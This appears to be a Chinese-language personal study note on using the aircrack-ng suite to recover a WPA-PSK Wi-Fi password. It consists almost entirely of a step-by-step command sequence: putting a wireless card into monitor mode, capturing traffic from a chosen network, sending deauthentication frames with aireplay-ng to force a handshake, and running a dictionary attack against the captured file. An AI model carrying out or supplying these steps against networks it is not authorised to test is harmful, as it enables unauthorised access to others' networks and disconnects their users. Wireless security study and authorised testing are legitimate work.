aircrack-ng工具学习记录（一）

利用aircrack-ng工具获取WPA-PSK加密的wifi的密码

• 关闭网络并结束相关进程
• 开启无线网卡到监听模式
• 监听周围的无线网络连接并获取握手消息
• 停止监听
• 获取密码

一、关闭网络并结束相关进程

1、关闭网络

service network-manager stop

2、结束相关进程结束相关进程

airmon-ng check killkill <pid>

二、开启无线网卡到监听模式

1、查看网卡列表

iwconfig

2、启动网卡到监听模式并获得接口名

airmon-ng start <interface>显示出新的接口名在monitor mode enabled on <接口名>

三、监听周围的无线网络连接并获取握手信息

1、监听周围所有无线网络信息

airodump-ng <接口名>找出某一无线网络的信息（一行）BSSID STATION CH

2、监听感兴趣的无线网络

airodump-ng --bssid  <BSSID> -c <CH> -w tmp <接口名>注：tmp是我们保存网络数据的文件名

3、得到握手包

保持上一步中的窗口不关，新开一个窗口，执行如下命令：aireplay-ng -0 2 -a <BSSID> -c <STATION> <接口名>如果在步骤二的窗口中出现WPA handshake:<BSSID>则成功获取握手信息，可以结束监听。

四、停止监听

1、关闭监听接口

airmon-ng stop  <接口名>

2、启动网络

service network-manager start

五、获取密码

此时，执行命令的目录下有一个名为tmp-01.cap的文件，同时还需要一个密码文件passwd.txt。我这里是自己建立的密码文件，其中把可能的密码存储在里面。执行命令：aircrack-ng tmp-01.cap -w passwd.txt成功破解密码后会出现 KEY FOUND ! [密码]